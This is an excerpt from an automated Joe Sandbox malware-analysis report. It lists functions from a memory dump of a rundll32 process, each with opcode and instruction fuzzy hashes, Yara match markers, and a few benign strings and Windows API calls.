                                                • Instruction Fuzzy Hash: 3CC171B4E052698FCB64CF58C990B9DBBB1BF49304F1482D9D949A7346D730AA81CF54
                                                Function 7F2DC170 Relevance: 1.4, Strings: 1, Instructions: 199COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: N/A
                                                • API String ID: 0-2525114547
                                                • Opcode ID: acba623d70b6484877b1527fc1916dc88f66fa2d753aad85c50ba0a3abcb85c1
                                                • Instruction ID: f9eb926e5b19e2df9da2f6dba12579092681a29dae99473401cd36c81e692b1f
                                                • Opcode Fuzzy Hash: acba623d70b6484877b1527fc1916dc88f66fa2d753aad85c50ba0a3abcb85c1
                                                • Instruction Fuzzy Hash: 5BA1D074E04258DFCB14CF98C890ADDFBB2BF89304F248199E859AB355D734AA45CF91
                                                Function 7F2D9A90 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: N/A
                                                • API String ID: 0-2525114547
                                                • Opcode ID: f7319cc033466fb192cf19724654f7a336b07bc006b700232a3d52dbec4cd9db
                                                • Instruction ID: 8b1b14a87d9dbc38f6d9f0711c1b55bbad8b0a41887a1e4d1d8f0713b664fdbd
                                                • Opcode Fuzzy Hash: f7319cc033466fb192cf19724654f7a336b07bc006b700232a3d52dbec4cd9db
                                                • Instruction Fuzzy Hash: ECA1BF78E052599FCB14CF98C990ADDFBF2BF88304F24819AE859AB305D734AA41CF50
                                                Function 7F2B4280 Relevance: .8, Instructions: 827COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: edaa1447cf3235624d7b53505e49af9f0030d26a5f90098b5fd0aef4abffaeb1
                                                • Instruction ID: 0240b63e53b58f290841cc5bcc2f7f4fcb6f4a2efc3eac81a05703646bd25e17
                                                • Opcode Fuzzy Hash: edaa1447cf3235624d7b53505e49af9f0030d26a5f90098b5fd0aef4abffaeb1
                                                • Instruction Fuzzy Hash: E3A27C78E052698FDB65CF68C990BDDBBB2BF49304F1081DAD849AB345D734AA81CF50
                                                Function 7F2B47D4 Relevance: .3, Instructions: 335COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c020e87c38c58edd57ff95e5dea8cb4e0bf70ec40c866c064afaf11bb8357492
                                                • Instruction ID: 4d8786ea219b4669c056ec9ddab4d63defc519c1766f90d0434f2469cf76490a
                                                • Opcode Fuzzy Hash: c020e87c38c58edd57ff95e5dea8cb4e0bf70ec40c866c064afaf11bb8357492
                                                • Instruction Fuzzy Hash: 5A127E78E052698FDB64CF58C994B9DBBB2BF89304F2081D9D849AB345D734AE81CF50
                                                Function 7F2EAAF0 Relevance: .3, Instructions: 288COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: add8a23739b7b53e24ebff533506f9a7d62a377ad97ca8564ca037c9842dbe05
                                                • Instruction ID: c23cbbb39c88147a62c53deadbea12a56a49c6d599bdd1715f4723af70c87b7b
                                                • Opcode Fuzzy Hash: add8a23739b7b53e24ebff533506f9a7d62a377ad97ca8564ca037c9842dbe05
                                                • Instruction Fuzzy Hash: 5BD11C74A01209DFCB45CF69C495A9DBBF2FF89314F64C299E81AAB354D331A981CF80
                                                Function 7F2B42E4 Relevance: .2, Instructions: 225COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6f3193ded926ed4420defb500cfa97874007a13f02a14ad6cbc4be5a94fad96a
                                                • Instruction ID: 375e2abf5b1403a5f3a73a09fda37699289b246af820af599fb53221261016ea
                                                • Opcode Fuzzy Hash: 6f3193ded926ed4420defb500cfa97874007a13f02a14ad6cbc4be5a94fad96a
                                                • Instruction Fuzzy Hash: 2ED16B78E04269CFCB64CF58C990BDDBBB1BF88304F1482DAD849A7355DA34AA81CF50
                                                Function 7F2BD6C0 Relevance: .2, Instructions: 222COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3fe2d673f2e23735ff781ad6712ceb0e2a8365a69fdf8160b1860f8b8e2484d2
                                                • Instruction ID: af5b1bab3ae8b82613580438d87df6b929be61f6cf979a51296b509b58a2cb36
                                                • Opcode Fuzzy Hash: 3fe2d673f2e23735ff781ad6712ceb0e2a8365a69fdf8160b1860f8b8e2484d2
                                                • Instruction Fuzzy Hash: 2DB1C0B8D04259DFCB14CFA8C890BEDBBB1BF49314F108299D859AB385D7346A85CF90
                                                Function 7F2BD370 Relevance: .2, Instructions: 222COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 724a6813346280bb4e49266c1b74444135f053dba4e80fa8bf61d6c8e0cd22e1
                                                • Instruction ID: c077b84ab4b773d70503ab6956aa86c76215559e4dfc22a843a9716c35f272ad
                                                • Opcode Fuzzy Hash: 724a6813346280bb4e49266c1b74444135f053dba4e80fa8bf61d6c8e0cd22e1
                                                • Instruction Fuzzy Hash: A5B1BFB4D04259DFCB14CFA8C890BEDBBB1BF49314F108299D859AB385D734AA85CF90
                                                Function 7F2BE250 Relevance: .2, Instructions: 222COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b3f4e17a6bbbbdc10e46a4bb5043bc965533cb31d00bafca8ced18c1760c36e8
                                                • Instruction ID: 1c1285392c9a6d5e22fc9b6d461e6f557acd593c7e5f7ab90fd0e87f56057536
                                                • Opcode Fuzzy Hash: b3f4e17a6bbbbdc10e46a4bb5043bc965533cb31d00bafca8ced18c1760c36e8
                                                • Instruction Fuzzy Hash: 5AB1C174D04259DFCB14CFA8C890BEDBBB1BF49314F108299D819AB385D734AA85CF91
                                                Function 7F2B6E80 Relevance: .2, Instructions: 214COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2d59a319cfa946ca7337b894a61833da0227367b0d0c7e8111fbdef103237116
                                                • Instruction ID: 33f7c0fb26c87b7076d637ceea9ba993c4133f05cb9ca60f2e844f5a31f112ce
                                                • Opcode Fuzzy Hash: 2d59a319cfa946ca7337b894a61833da0227367b0d0c7e8111fbdef103237116
                                                • Instruction Fuzzy Hash: 2FB19378D10219DFCB14CF99C590AADFBB1FF48344F20819AE859AB355E734AA81CF54
                                                Function 7F2B72D0 Relevance: .2, Instructions: 173COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bf29178ce094cd6ff59a6710f19606cfda52a8ee28c61626a8c9b7fe36ec1fad
                                                • Instruction ID: cf662865dc8ea8298ff8e7e62338289494a6f2a46537902dfc354d916c007fad
                                                • Opcode Fuzzy Hash: bf29178ce094cd6ff59a6710f19606cfda52a8ee28c61626a8c9b7fe36ec1fad
                                                • Instruction Fuzzy Hash: 32918F78E15259DFCB08CFA9D490AEDFBB2BF48304F2481A9D815AB345D738A941CF90
                                                Function 7F2C5CD0 Relevance: .2, Instructions: 163COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7894568d44e382275c7355847ad892dfa58d296d52f6d85062c2a1476f1e2588
                                                • Instruction ID: db887f43575dabf923f35919a00f6673555c6449a3fc08ff59c805253a286f30
                                                • Opcode Fuzzy Hash: 7894568d44e382275c7355847ad892dfa58d296d52f6d85062c2a1476f1e2588
                                                • Instruction Fuzzy Hash: 58819FB8E05249DFCB05CFA9C491AEDFBB2BF48304F248299D815AB345D735A946CF90
                                                Function 7F2F64ED Relevance: .2, Instructions: 158COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6a4520f36a809a18397db0f2ab063229439142230a76a1cf20750397584d6650
                                                • Instruction ID: 738aa1b5e984bf35ca5f6d85c23bea93f657462ed05b37deaae4ee1d25864a0a
                                                • Opcode Fuzzy Hash: 6a4520f36a809a18397db0f2ab063229439142230a76a1cf20750397584d6650
                                                • Instruction Fuzzy Hash: F0515F71E1021AEFDF05CF99C950AAEBFF6EF88304F198059E415AB245D734AA50CB94
                                                Function 7F2B6C70 Relevance: .2, Instructions: 156COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6da16525bf5588034099ad3ebae02f39126e56f85074f42ce83d4094566c102d
                                                • Instruction ID: b49d0fa2ad456211c22116f4644a3f9e0b0a110e57d52a8cd5d71e702ec7a217
                                                • Opcode Fuzzy Hash: 6da16525bf5588034099ad3ebae02f39126e56f85074f42ce83d4094566c102d
                                                • Instruction Fuzzy Hash: 62818FB8E04259DFCB04CF98C590AEDFBB1BF48304F2081AAD855AB355D734AA85CF94
                                                Function 7F2B6F1A Relevance: .1, Instructions: 146COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6750dc95a881e0ba319b8d51a47873d370098e00a8ed0d55af29bcb13d909daf
                                                • Instruction ID: 22e113f82f7bea3905889378a17e02e717570f53ba443112a2c1d22e888d4876
                                                • Opcode Fuzzy Hash: 6750dc95a881e0ba319b8d51a47873d370098e00a8ed0d55af29bcb13d909daf
                                                • Instruction Fuzzy Hash: EC719074E10219CBCB18CF99C490AEDFBB2FF48350F24819AD855A7355E734AA81CF60
                                                Function 7F2C2A20 Relevance: .1, Instructions: 138COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a81ac5fefb6689b28e7d3d515c49c4fbaa181e5f075f0e7c0c759a794e5351dc
                                                • Instruction ID: 08aff5a1d4c688f67075ef3582702b5bf3335a689e32aa4e3afdb8ee7335260f
                                                • Opcode Fuzzy Hash: a81ac5fefb6689b28e7d3d515c49c4fbaa181e5f075f0e7c0c759a794e5351dc
                                                • Instruction Fuzzy Hash: BC617E78E04259DFCB18CF99C590AADFBB2FF88304F24825AD815AB355D734AA45CF90
                                                Function 7F2D5EC0 Relevance: .1, Instructions: 134COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 62509378abaa459587042215145ccaa329c69774e4d554f83ed17055aacb7123
                                                • Instruction ID: 941f565744d68865d5556d750667e97871ed9d87f2689a202cbef29c48d1cc61
                                                • Opcode Fuzzy Hash: 62509378abaa459587042215145ccaa329c69774e4d554f83ed17055aacb7123
                                                • Instruction Fuzzy Hash: D1617FB8E04259DFCB04CFA8C490AADFBB1FF48304F24815AE855AB345D735AA42CF90
                                                Function 7F31CC3C Relevance: .1, Instructions: 111COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 63d9b7352c91426c1e9df31a8ec6d5464a276f1ee343c2667d0553c946bc237c
                                                • Instruction ID: 467a3abf1d0a69a414e5a81044fa7061ef955a4b60fd4533e7a3b89696777832
                                                • Opcode Fuzzy Hash: 63d9b7352c91426c1e9df31a8ec6d5464a276f1ee343c2667d0553c946bc237c
                                                • Instruction Fuzzy Hash: 7F310335909BC29FD30ECA3189530E6FFB4BE93254BA571AB8446C5C62C32CAC75CB91
                                                Function 7F31CC44 Relevance: .1, Instructions: 109COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a30358e5d4e52a5d7c6a3b09ff20074403529a4c50b9fe4cd1eb4df955bf9e59
                                                • Instruction ID: 6eb1681bfa8114f055fae5ca32b4c89e480960938dd2fc80dcad830da7195f5e
                                                • Opcode Fuzzy Hash: a30358e5d4e52a5d7c6a3b09ff20074403529a4c50b9fe4cd1eb4df955bf9e59
                                                • Instruction Fuzzy Hash: FF31F735909BC29FD30ECA3589530E6FFB4BE83254BA571AB8456C5C62C32CAC75CB91
                                                Function 7F31CC48 Relevance: .1, Instructions: 107COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fa64db1eadf16db7c12d5b0a91ca6391b56afdc97e1fb92eba81a4a822b16940
                                                • Instruction ID: 641c1e4feb9c3bf93bb70384289e94b52cb89d65b407c768084094e9a52640ae
                                                • Opcode Fuzzy Hash: fa64db1eadf16db7c12d5b0a91ca6391b56afdc97e1fb92eba81a4a822b16940
                                                • Instruction Fuzzy Hash: 1431F535909BC29FD30ECA3189530E6FFA4BE83254BA571AB8456C5C62C328AC75CB91
                                                Function 7F31CC54 Relevance: .1, Instructions: 103COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6e382d9ef216e2dbf16e1f7e7282563c8ae677cf55728833ff5d7bd28b657e76
                                                • Instruction ID: 2c9cdfe8f7fc0a19e2fd379d3dabfed11885027fd7b0229f65d4cdfdc166aacd
                                                • Opcode Fuzzy Hash: 6e382d9ef216e2dbf16e1f7e7282563c8ae677cf55728833ff5d7bd28b657e76
                                                • Instruction Fuzzy Hash: 0831E135909BC79FD30ECA3189530E6FFA4FE83250BA571AA8456C5C61C32CAC76CB91
                                                Function 7F31CC60 Relevance: .1, Instructions: 98COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b01410e0dba8f240bc758d1c0410acb355e1b4e9885cd2020f8f85382faeb3db
                                                • Instruction ID: e458456dfe5b709abda07aa4d0b21ba1a62138a8220d0a0a8f4b83be44c2d62d
                                                • Opcode Fuzzy Hash: b01410e0dba8f240bc758d1c0410acb355e1b4e9885cd2020f8f85382faeb3db
                                                • Instruction Fuzzy Hash: D631D935905BC79FD30ECA3289530EAFFA4FE83254BA5716A8456C1C21C328AC76CB91
                                                Function 7F2F1EE0 Relevance: .1, Instructions: 76COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                • Instruction ID: 001f3b5dc5ceead0f41e5848d62bf60d516f5dea4a08582f3285faafd292eafc
                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                • Instruction Fuzzy Hash: DD11E7B737538343E705893DD8B06E6E7F9EBC6231BE9437AD0838B658D326B1459A00
                                                Function 7F307A0D Relevance: .0, Instructions: 40COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 91debf21ff5fab131bb9820310f3a6b076498c3c8a87913a49044508fcd54c38
                                                • Instruction ID: cbd45dea4ab4c185b480a94359f178e2393fe56988ba2740ab8700f623a7ffb3
                                                • Opcode Fuzzy Hash: 91debf21ff5fab131bb9820310f3a6b076498c3c8a87913a49044508fcd54c38
                                                • Instruction Fuzzy Hash: 3BF06D726603649BC712EA6CC504BA973FEE709A52F1151A7B602DB350C2A0EF40C7D0
                                                Function 7F2EF610 Relevance: .0, Instructions: 39COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 045c068c9b4993117c9950ff781f0dc352064a25b1db4508318fbc32f48eaee0
                                                • Instruction ID: d4dfe57d59965f114fa1ac9ef1790a5609f37823124f8eee29ada10cfde2db0e
                                                • Opcode Fuzzy Hash: 045c068c9b4993117c9950ff781f0dc352064a25b1db4508318fbc32f48eaee0
                                                • Instruction Fuzzy Hash: 9AF0A4329003189BDB61DF68CC4CF86B3BCEB50210FE10560D579E7461E734F9458A80
                                                Function 7F307998 Relevance: .0, Instructions: 29COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cc02d778fd2513b72d452b4c73495b99cd35a046eec70408820e05d4955fe1e3
                                                • Instruction ID: b3e4bcf7cc95d955a8f49e7281769063c540d0da23000178a1e99c5c672879c8
                                                • Opcode Fuzzy Hash: cc02d778fd2513b72d452b4c73495b99cd35a046eec70408820e05d4955fe1e3
                                                • Instruction Fuzzy Hash: 13F03072A20264DBCB16DA4CC545A4973FEEB45B55F210097F502DB240D6B0EE00C7D0
                                                Function 7F3079DC Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 743f8f6ed7d3dafc849b8407b333ca00744b702c402de91a5cb1d0c5c83d8951
                                                • Instruction ID: 11f831741e76d6807851fea90c34dec29040436d0fef31054127ba624cf9d9fe
                                                • Opcode Fuzzy Hash: 743f8f6ed7d3dafc849b8407b333ca00744b702c402de91a5cb1d0c5c83d8951
                                                • Instruction Fuzzy Hash: AEE08C329212B8EBCB15EBD8C904D9AB3FDEB49B01B1104A7B902D3200C270DF00CBC0
                                                Function 7F3007C8 Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3d38f8285bf4b725786fbd66e075ee47408d2e1b61d09f82d003a7d56089bb9f
                                                • Instruction ID: c141f89ab75db02ef793797caae37c360648a3028e45eb64309b546814695c2e
                                                • Opcode Fuzzy Hash: 3d38f8285bf4b725786fbd66e075ee47408d2e1b61d09f82d003a7d56089bb9f
                                                • Instruction Fuzzy Hash: F6C040781557C0CACD19551085717AD3367E795A86F5014CEC5074FA41D51D6C46DF11
                                                Function 7F2BE5A0 Relevance: .0, Instructions: 11COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 517683b43767a3535c157b2b51665dec237b95770994ae3f6177b6cbaedc1245
                                                • Instruction ID: 7cacbbe88ecc4cab0eaef6d20cf23e499f9f73f380761552353fd898b1fb0951
                                                • Opcode Fuzzy Hash: 517683b43767a3535c157b2b51665dec237b95770994ae3f6177b6cbaedc1245
                                                • Instruction Fuzzy Hash: 14D0127490560CEBC704CF49D540959F7F8EB48650F208199EC0C83700D632AE01CA80
                                                Function 7F2DE1B0 Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5b0d8a4e177a3fa34641ad4046624ba9fb0ebdcef63e2a9b0089d13ea34cf4d4
                                                • Instruction ID: 0230c4de2727f5ca7c94c7bd14938b1f1fc6463ea35c1893f292ab52552c7abd
                                                • Opcode Fuzzy Hash: 5b0d8a4e177a3fa34641ad4046624ba9fb0ebdcef63e2a9b0089d13ea34cf4d4
                                                • Instruction Fuzzy Hash: 8CB011322A2B88CBC202CA8CE080E80B3ECE308E20F0000A0E80883B22C228FC00C880
                                                Function 7F2B6570 Relevance: 25.7, APIs: 4, Strings: 13, Instructions: 244COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: *$+$,$1$7$7$;$>$X$i$ivh$u$w
                                                • API String ID: 0-285284801
                                                • Opcode ID: 9cf8a9e5f990795dc94c10344a9ad2e6a6143c3edd9682c0405643456c53ab70
                                                • Instruction ID: d0b4236ec4148f82c740f467e78270545edc584b96d169ff838d1e58c484eb40
                                                • Opcode Fuzzy Hash: 9cf8a9e5f990795dc94c10344a9ad2e6a6143c3edd9682c0405643456c53ab70
                                                • Instruction Fuzzy Hash: 08B12474D04289DFEB01CFA8C854BDEBBB1AF48304F144199E945BB380E7B96A49CF65
                                                Function 7F2FECAE Relevance: 21.4, APIs: 2, Strings: 10, Instructions: 402COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 7F2FED54
                                                • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,?,?,?,?,?,?,?,?,?,?), ref: 7F2FED78
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Module$FileHandleName
                                                • String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program: $\
                                                • API String ID: 4146042529-3261600717
